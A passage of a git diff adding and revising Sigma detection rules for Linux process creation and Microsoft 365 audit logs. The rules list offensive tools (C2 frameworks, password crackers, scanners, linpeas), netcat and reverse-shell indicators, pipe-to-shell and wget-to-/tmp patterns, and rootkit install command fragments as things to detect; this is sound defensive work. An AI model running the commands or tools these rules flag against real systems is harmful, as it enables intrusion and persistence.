'/msfvenom' + - '/ps-empire server' + - '/ps-empire' + - '/sliver-client' + - '/sliver-server' + - '/Villain.py' + selection_c2_framework_cobaltstrike: + Image|contains: + - '/cobaltstrike' + - '/teamserver' + selection_scanners: + Image|endswith: + - '/autorecon' + - '/httpx' + - '/legion' + - '/naabu' + - '/netdiscover' + - '/nmap' + - '/nuclei' + - '/recon-ng' + - '/zenmap' + selection_scanners_sniper: + Image|contains: '/sniper' + selection_web_enum: + Image|endswith: + - '/dirb' + - '/dirbuster' + - '/eyewitness' + - '/feroxbuster' + - '/ffuf' + - '/gobuster' + - '/wfuzz' + - '/whatweb' + selection_web_vuln: + Image|endswith: + - '/joomscan' + - '/nikto' + - '/wpscan' + selection_exploit_tools: + Image|endswith: + - '/aircrack-ng' + - '/bloodhound-python' + - '/bpfdos' + - '/ebpfki' + - '/evil-winrm' + - '/hashcat' + - '/hoaxshell.py' + - '/hydra' + - '/john' + - '/ncrack' + # default binary: https://github.com/Pennyw0rth/NetExec/releases/download/v1.0.0/nxc-ubuntu-latest + - '/nxc-ubuntu-latest' + - '/pidhide' + - '/pspy32' + - '/pspy32s' + - '/pspy64' + - '/pspy64s' + - '/setoolkit' + - '/sqlmap' + - '/writeblocker' + selection_linpeas: + # covers: all linux versions listed here: https://github.com/carlospolop/PEASS-ng/releases + Image|contains: '/linpeas' + condition: 1 of selection_* +falsepositives: + - Unlikely +level: high diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_inod_listing.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_inod_listing.yml new file mode 100644 index 000000000..0b288ba24 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_inod_listing.yml @@ -0,0 +1,28 @@ +title: Potential Container Discovery Via Inodes Listing +id: 43e26eb5-cd58-48d1-8ce9-a273f5d298d8 +status: experimental +description: Detects listing of the inodes of the "/" directory to determine if the we are running inside of a container. +references: + - https://blog.skyplabs.net/posts/container-detection/ + - https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker +tags: + - attack.discovery + - attack.t1082 +author: Seth Hanford +date: 2023/08/23 +logsource: + category: process_creation + product: linux +detection: + selection: + # inode outside containers low, inside high + Image|endswith: '/ls' + CommandLine|contains|all: + - ' -*i' # -i finds inode number + - ' -*d' # -d gets directory itself, not contents + CommandLine|endswith: ' /' + condition: selection +falsepositives: + - Legitimate system administrator usage of these commands + - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered +level: low diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml index 6009d43ce..f4d1b9094 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml @@ -1,30 +1,35 @@ title: Interactive Bash Suspicious Children id: ea3ecad2-db86-4a89-ad0b-132a10d2db55 -status: experimental +status: test description: Detects suspicious interactive bash as a parent to rather uncommon child processes references: - - Internal Research + - Internal Research +author: Florian Roth (Nextron Systems) date: 2022/03/14 -author: Florian Roth +tags: + - attack.execution + - attack.defense_evasion + - attack.t1059.004 + - attack.t1036 logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - ParentCommandLine: 'bash -i' - anomaly1: - CommandLine|contains: - - '-c import ' - - 'base64' - - 'pty.spawn' - anomaly2: - Image|endswith: - - 'whoami' - - 'iptables' - - '/ncat' - - '/nc' - - '/netcat' - condition: selection and 1 of anomaly* + selection: + ParentCommandLine: 'bash -i' + anomaly1: + CommandLine|contains: + - '-c import ' + - 'base64' + - 'pty.spawn' + anomaly2: + Image|endswith: + - 'whoami' + - 'iptables' + - '/ncat' + - '/nc' + - '/netcat' + condition: selection and 1 of anomaly* falsepositives: - - Legitimate software that uses these patterns + - Legitimate software that uses these patterns level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml index 4e71ecba4..4e9106596 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml @@ -1,11 +1,11 @@ title: Suspicious Java Children Processes id: d292e0af-9a18-420c-9525-ec0ac3936892 -status: experimental +status: test description: Detects java process spawning suspicious children -author: Nasreddine Bencherchali -date: 2022/06/03 references: - https://www.tecmint.com/different-types-of-linux-shells/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/06/03 tags: - attack.execution - attack.t1059 diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_network_utilities_execution.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_network_utilities_execution.yml new file mode 100644 index 000000000..8111a5334 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_network_utilities_execution.yml @@ -0,0 +1,42 @@ +title: Linux Network Service Scanning Tools Execution +id: 3e102cd9-a70d-4a7a-9508-403963092f31 +status: test +description: Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md + - https://github.com/projectdiscovery/naabu + - https://github.com/Tib3rius/AutoRecon +author: Alejandro Ortuno, oscd.community, Georg Lauenstein (sure[secure]) +date: 2020/10/21 +modified: 2023/10/25 +tags: + - attack.discovery + - attack.t1046 +logsource: + category: process_creation + product: linux +detection: + selection_netcat: + Image|endswith: + - '/nc' + - '/ncat' + - '/netcat' + - '/socat' + selection_network_scanning_tools: + Image|endswith: + - '/autorecon' + - '/hping' + - '/hping2' + - '/hping3' + - '/naabu' + - '/nmap' + - '/nping' + - '/telnet' # could be wget, curl, ssh, many things. basically everything that is able to do network connection. consider fine tuning + filter_main_netcat_listen_flag: + CommandLine|contains: + - ' --listen ' + - ' -l ' + condition: (selection_netcat and not filter_main_netcat_listen_flag) or selection_network_scanning_tools +falsepositives: + - Legitimate administration activities +level: low diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml index e89e239d6..ea7c51a21 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml @@ -1,28 +1,35 @@ title: Linux Shell Pipe to Shell id: 880973f3-9708-491c-a77b-2a35a1921158 -status: experimental +status: test description: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell references: - - Internal Research + - Internal Research +author: Florian Roth (Nextron Systems) date: 2022/03/14 -author: Florian Roth +modified: 2022/07/26 tags: - attack.defense_evasion - attack.t1140 logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - CommandLine|startswith: - - 'sh -c ' - - 'bash -c ' - CommandLine|endswith: - - '| bash' - - '|bash' - - '| sh' - - '|sh' - condition: selection + selection: + CommandLine|startswith: + - 'sh -c ' + - 'bash -c ' + selection_exec: + - CommandLine|contains: + - '| bash ' + - '| sh ' + - '|bash ' + - '|sh ' + - CommandLine|endswith: + - '| bash' + - '| sh' + - '|bash' + - ' |sh' + condition: all of selection* falsepositives: - - Legitimate software that uses these patterns + - Legitimate software that uses these patterns level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml index 190477e5a..d2581b081 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml @@ -1,25 +1,25 @@ title: Linux Recon Indicators id: 0cf7a157-8879-41a2-8f55-388dd23746b7 -status: experimental +status: test description: Detects events with patterns found in commands used for reconnaissance on linux systems -author: Florian Roth references: - - https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py + - https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py +author: Florian Roth (Nextron Systems) date: 2022/06/20 +tags: + - attack.reconnaissance + - attack.t1592.004 + - attack.credential_access + - attack.t1552.001 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - CommandLine|contains: - - ' -name .htpasswd' - - ' -perm -4000 ' - condition: selection + selection: + CommandLine|contains: + - ' -name .htpasswd' + - ' -perm -4000 ' + condition: selection falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: high -tags: - - attack.reconnaissance - - attack.t1592.004 - - attack.credential_access - - attack.t1552.001 diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_sensitive_file_access.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_sensitive_file_access.yml new file mode 100644 index 000000000..7d5a91f86 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_sensitive_file_access.yml @@ -0,0 +1,50 @@ +title: Potential Suspicious Change To Sensitive/Critical Files +id: 86157017-c2b1-4d4a-8c33-93b8e67e4af4 +status: experimental +description: Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system. +references: + - https://docs.microsoft.com/en-us/azure/defender-for-cloud/file-integrity-monitoring-overview#which-files-should-i-monitor +author: '@d4ns4n_ (Wuerth-Phoenix)' +date: 2023/05/30 +tags: + - attack.impact + - attack.t1565.001 +logsource: + category: process_creation + product: linux +detection: + selection_img_1: + Image|endswith: + - '/cat' + - '/echo' + - '/grep' + - '/head' + - '/more' + - '/tail' + CommandLine|contains: '>' + selection_img_2: + Image|endswith: + - '/emacs' + - '/nano' + - '/sed' + - '/vi' + - '/vim' + selection_paths: + CommandLine|contains: + - '/bin/login' + - '/bin/passwd' + - '/boot/' + - '/etc/*.conf' + - '/etc/cron.' # Covers different cron config files "daily", "hourly", etc. + - '/etc/crontab' + - '/etc/hosts' + - '/etc/init.d' + - '/etc/sudoers' + - '/opt/bin/' + - '/sbin' # Covers: '/opt/sbin', '/usr/local/sbin/', '/usr/sbin/' + - '/usr/bin/' + - '/usr/local/bin/' + condition: 1 of selection_img_* and selection_paths +falsepositives: + - Some false positives are to be expected on user or administrator machines. Apply additional filters as needed. +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml new file mode 100644 index 000000000..64236d73d --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml @@ -0,0 +1,31 @@ +title: Shell Execution Of Process Located In Tmp Directory +id: 2fade0b6-7423-4835-9d4f-335b39b83867 +status: experimental +description: Detects execution of shells from a parent process located in a temporary (/tmp) directory +references: + - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html + - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ + - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection + - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection +author: Joseliyo Sanchez, @Joseliyo_Jstnk +date: 2023/06/02 +tags: + - attack.execution +logsource: + product: linux + category: process_creation +detection: + selection: + ParentImage|startswith: '/tmp/' + Image|endswith: + - '/bash' + - '/csh' + - '/dash' + - '/fish' + - '/ksh' + - '/sh' + - '/zsh' + condition: selection +falsepositives: + - Unknown +level: high diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml new file mode 100644 index 000000000..71eedc0df --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml @@ -0,0 +1,35 @@ +title: Execution Of Script Located In Potentially Suspicious Directory +id: 30bcce26-51c5-49f2-99c8-7b59e3af36c7 +status: experimental +description: Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc. +references: + - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html + - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ + - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection + - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection +author: Joseliyo Sanchez, @Joseliyo_Jstnk +date: 2023/06/02 +tags: + - attack.execution +logsource: + product: linux + category: process_creation +detection: + selection_img: + Image|endswith: + - '/bash' + - '/csh' + - '/dash' + - '/fish' + - '/ksh' + - '/sh' + - '/zsh' + selection_flag: + CommandLine|contains: ' -c ' + selection_paths: + # Note: Add more suspicious paths + CommandLine|contains: '/tmp/' + condition: all of selection_* +falsepositives: + - Unknown +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml index 8bec4ce24..f45de992b 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml @@ -2,11 +2,11 @@ title: System Information Discovery id: 42df45e7-e6e9-43b5-8f26-bec5b39cc239 status: stable description: Detects system information discovery commands +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md author: Ömer Günal, oscd.community date: 2020/10/08 modified: 2021/09/14 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md tags: - attack.discovery - attack.t1082 @@ -16,13 +16,13 @@ logsource: detection: selection: Image|endswith: - - '/uname' - - '/hostname' - - '/uptime' - - '/lspci' - - '/dmidecode' - - '/lscpu' - - '/lsmod' + - '/uname' + - '/hostname' + - '/uptime' + - '/lspci' + - '/dmidecode' + - '/lscpu' + - '/lsmod' condition: selection falsepositives: - Legitimate administration activities diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml index b013e068b..0b2ca2e7a 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml @@ -1,27 +1,30 @@ -title: System Network Connections Discovery +title: System Network Connections Discovery - Linux id: 4c519226-f0cd-4471-bd2f-6fbb2bb68a79 status: test description: Detects usage of system utilities to discover system network connections -author: Daniil Yugoslavskiy, oscd.community references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md +author: Daniil Yugoslavskiy, oscd.community date: 2020/10/19 -modified: 2021/11/27 +modified: 2023/01/17 +tags: + - attack.discovery + - attack.t1049 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: - - '/who' - - '/w' - - '/last' - - '/lsof' - - '/netstat' - condition: selection + selection: + Image|endswith: + - '/who' + - '/w' + - '/last' + - '/lsof' + - '/netstat' + filter_landscape_sysinfo: + ParentCommandLine|contains: '/usr/bin/landscape-sysinfo' + Image|endswith: '/who' + condition: selection and not 1 of filter_* falsepositives: - - Legitimate activities + - Legitimate activities level: low -tags: - - attack.discovery - - attack.t1049 diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml index 891e743f3..69a1c8799 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml @@ -2,32 +2,32 @@ title: System Network Discovery - Linux id: e7bd1cfa-b446-4c88-8afb-403bcd79e3fa status: test description: Detects enumeration of local network configuration -author: Ömer Günal and remotephone, oscd.community references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md +author: Ömer Günal and remotephone, oscd.community date: 2020/10/06 -modified: 2021/11/27 +modified: 2022/09/15 +tags: + - attack.discovery + - attack.t1016 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection1: - Image|endswith: - - '/firewall-cmd' - - '/ufw' - - '/iptables' - - '/netstat' - - '/ss' - - '/ip' - - '/ifconfig' - - '/systemd-resolve' - - '/route' - selection2: - CommandLine|contains: '/etc/resolv.conf' - condition: selection1 or selection2 + selection_img: + Image|endswith: + - '/firewall-cmd' + - '/ufw' + - '/iptables' + - '/netstat' + - '/ss' + - '/ip' + - '/ifconfig' + - '/systemd-resolve' + - '/route' + selection_cli: + CommandLine|contains: '/etc/resolv.conf' + condition: 1 of selection_* falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: informational -tags: - - attack.discovery - - attack.t1016 diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_touch_susp.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_touch_susp.yml new file mode 100644 index 000000000..ac6b07c9c --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_touch_susp.yml @@ -0,0 +1,24 @@ +title: Touch Suspicious Service File +id: 31545105-3444-4584-bebf-c466353230d2 +status: test +description: Detects usage of the "touch" process in service file. +references: + - https://blogs.blackberry.com/ + - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 +author: Joseliyo Sanchez, @Joseliyo_Jstnk +date: 2023/01/11 +tags: + - attack.defense_evasion + - attack.t1070.006 +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: '/touch' + CommandLine|contains: ' -t ' + CommandLine|endswith: '.service' + condition: selection +falsepositives: + - Admin changing date of files. +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml new file mode 100644 index 000000000..31d219dc9 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml @@ -0,0 +1,22 @@ +title: Triple Cross eBPF Rootkit Execve Hijack +id: 0326c3c8-7803-4a0f-8c5c-368f747f7c3e +status: test +description: Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges +references: + - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275 +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/07/05 +tags: + - attack.defense_evasion + - attack.privilege_escalation +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/sudo' + CommandLine|contains: 'execve_hijack' + condition: selection +falsepositives: + - Unlikely +level: high diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml new file mode 100644 index 000000000..f7d1534ee --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml @@ -0,0 +1,27 @@ +title: Triple Cross eBPF Rootkit Install Commands +id: 22236d75-d5a0-4287-bf06-c93b1770860f +status: test +description: Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script +references: + - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/07/05 +tags: + - attack.defense_evasion + - attack.t1014 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/sudo' + CommandLine|contains|all: + - ' tc ' + - ' enp0s3 ' + CommandLine|contains: + - ' qdisc ' + - ' filter ' + condition: selection +falsepositives: + - Unlikely +level: high diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_userdel.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_userdel.yml new file mode 100644 index 000000000..eed85d3c1 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_userdel.yml @@ -0,0 +1,24 @@ +title: User Has Been Deleted Via Userdel +id: 08f26069-6f80-474b-8d1f-d971c6fedea0 +status: test +description: Detects execution of the "userdel" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks +references: + - https://linuxize.com/post/how-to-delete-group-in-linux/ + - https://www.cyberciti.biz/faq/linux-remove-user-command/ + - https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/ + - https://linux.die.net/man/8/userdel +author: Tuan Le (NCSGroup) +date: 2022/12/26 +tags: + - attack.impact + - attack.t1531 +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: '/userdel' + condition: selection +falsepositives: + - Legitimate administrator activities +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml new file mode 100644 index 000000000..15e18c816 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml @@ -0,0 +1,25 @@ +title: User Added To Root/Sudoers Group Using Usermod +id: 6a50f16c-3b7b-42d1-b081-0fdd3ba70a73 +status: test +description: Detects usage of the "usermod" binary to add users add users to the root or suoders groups +references: + - https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/ + - https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/ +author: TuanLe (GTSC) +date: 2022/12/21 +tags: + - attack.privilege_escalation + - attack.persistence +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: '/usermod' + CommandLine|contains: + - '-aG root' + - '-aG sudoers' + condition: selection +falsepositives: + - Legitimate administrator activities +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml index 2d6feee4a..8cf0416cf 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml @@ -1,42 +1,50 @@ title: Linux Webshell Indicators id: 818f7b24-0fba-4c49-a073-8b755573b9c7 -status: experimental +status: test description: Detects suspicious sub processes of web server processes references: - - https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/ + - https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/ + - https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) date: 2021/10/15 -modified: 2022/06/03 -author: Florian Roth +modified: 2022/12/28 tags: - attack.persistence - attack.t1505.003 logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection_general: - ParentImage|endswith: - - '/httpd' - - '/lighttpd' - - '/nginx' - - '/apache2' - - '/node' - - '/caddy' - selection_tomcat: - ParentCommandLine|contains|all: - - '/bin/java' - - 'tomcat' - selection_websphere: # ? just guessing - ParentCommandLine|contains|all: - - '/bin/java' - - 'websphere' - selection_sub_processes: - Image|endswith: - - '/whoami' - - '/ifconfig' - - '/usr/bin/ip' - - '/bin/uname' - condition: selection_sub_processes and ( selection_general or selection_tomcat or selection_websphere) + selection_general: + ParentImage|endswith: + - '/httpd' + - '/lighttpd' + - '/nginx' + - '/apache2' + - '/node' + - '/caddy' + selection_tomcat: + ParentCommandLine|contains|all: + - '/bin/java' + - 'tomcat' + selection_websphere: # ? just guessing + ParentCommandLine|contains|all: + - '/bin/java' + - 'websphere' + sub_processes: + Image|endswith: + - '/whoami' + - '/ifconfig' + - '/ip' + - '/bin/uname' + - '/bin/cat' + - '/bin/crontab' + - '/hostname' + - '/iptables' + - '/netstat' + - '/pwd' + - '/route' + condition: 1 of selection_* and sub_processes falsepositives: - - Web applications that invoke Linux command line tools + - Web applications that invoke Linux command line tools level: high diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_wget_download_suspicious_directory.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_wget_download_suspicious_directory.yml new file mode 100644 index 000000000..87af0ce34 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_wget_download_suspicious_directory.yml @@ -0,0 +1,29 @@ +title: Download File To Potentially Suspicious Directory Via Wget +id: cf610c15-ed71-46e1-bdf8-2bd1a99de6c4 +status: experimental +description: Detects the use of wget to download content to a suspicious directory +references: + - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html + - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ + - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection + - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection +author: Joseliyo Sanchez, @Joseliyo_Jstnk +date: 2023/06/02 +tags: + - attack.command_and_control + - attack.t1105 +logsource: + category: process_creation + product: linux +detection: + selection_img: + Image|endswith: '/wget' + selection_output: + - CommandLine|re: '\s-O\s' # We use regex to ensure a case sensitive argument detection + - CommandLine|contains: '--output-document' + selection_path: + CommandLine|contains: '/tmp/' + condition: all of selection_* +falsepositives: + - Unknown +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_xterm_reverse_shell.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_xterm_reverse_shell.yml new file mode 100644 index 000000000..85a089c11 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_xterm_reverse_shell.yml @@ -0,0 +1,24 @@ +title: Potential Xterm Reverse Shell +id: 4e25af4b-246d-44ea-8563-e42aacab006b +status: test +description: Detects usage of "xterm" as a potential reverse shell tunnel +references: + - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet + - https://www.revshells.com/ +author: '@d4ns4n_' +date: 2023/04/24 +tags: + - attack.execution + - attack.t1059 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|contains: 'xterm' + CommandLine|contains: '-display' + CommandLine|endswith: ':1' + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/src/main/resources/rules/m365/microsoft365_disabling_mfa.yml b/src/main/resources/rules/m365/microsoft365_disabling_mfa.yml new file mode 100644 index 000000000..f1516794b --- /dev/null +++ b/src/main/resources/rules/m365/microsoft365_disabling_mfa.yml @@ -0,0 +1,21 @@ +title: Disabling Multi Factor Authentication +id: 60de9b57-dc4d-48b9-a6a0-b39e0469f876 +status: experimental +description: Detects disabling of Multi Factor Authentication. +references: + - https://research.splunk.com/cloud/c783dd98-c703-4252-9e8a-f19d9f5c949e/ +author: Splunk Threat Research Team (original rule), Harjot Singh @cyb3rjy0t (sigma rule) +date: 2023/09/18 +tags: + - attack.persistence + - attack.t1556 +logsource: + service: audit + product: m365 +detection: + selection: + Operation|contains: 'Disable Strong Authentication.' + condition: selection +falsepositives: + - Unlikely +level: high diff --git a/src/main/resources/rules/m365/microsoft365_new_federated_domain_added_audit.yml b/src/main/resources/rules/m365/microsoft365_new_federated_domain_added_audit.yml new file mode 100644 index 000000000..44c6a4916 --- /dev/null +++ b/src/main/resources/rules/m365/microsoft365_new_federated_domain_added_audit.yml @@ -0,0 +1,29 @@ +title: New Federated Domain Added +id: 58f88172-a73d-442b-94c9-95eaed3cbb36 +related: + - id: 42127bdd-9133-474f-a6f1-97b6c08a4339 + type: similar +status: experimental +description: Detects the addition of a new Federated Domain. +references: + - https://research.splunk.com/cloud/e155876a-6048-11eb-ae93-0242ac130002/ + - https://o365blog.com/post/aadbackdoor/ +author: Splunk Threat Research Team (original rule), Harjot Singh @cyb3rjy0t (sigma rule) +date: 2023/09/18 +tags: + - attack.persistence + - attack.t1136.003 +logsource: + service: audit + product: m365 +detection: + selection_domain: + Operation|contains: 'domain' + selection_operation: + Operation|contains: + - 'add' + - 'new' + condition: all of selection_* +falsepositives: + - The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider. +level: medium diff --git a/src/main/resources/rules/m365/microsoft365_new_federated_domain_added_exchange.yml b/src/main/resources/rules/m365/microsoft365_new_federated_domain_added_exchange.yml new file mode 100644 index 000000000..12563859a --- /dev/null +++ b/src/main/resources/rules/m365/microsoft365_new_federated_domain_added_exchange.yml @@ -0,0 +1,30 @@ +title: New Federated Domain Added - Exchange +id: 42127bdd-9133-474f-a6f1-97b6c08a4339 +related: + - id: 58f88172-a73d-442b-94c9-95eaed3cbb36 + type: similar +status: test +description: Detects the addition of a new Federated Domain. +references: + - https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf + - https://us-cert.cisa.gov/ncas/alerts/aa21-008a + - 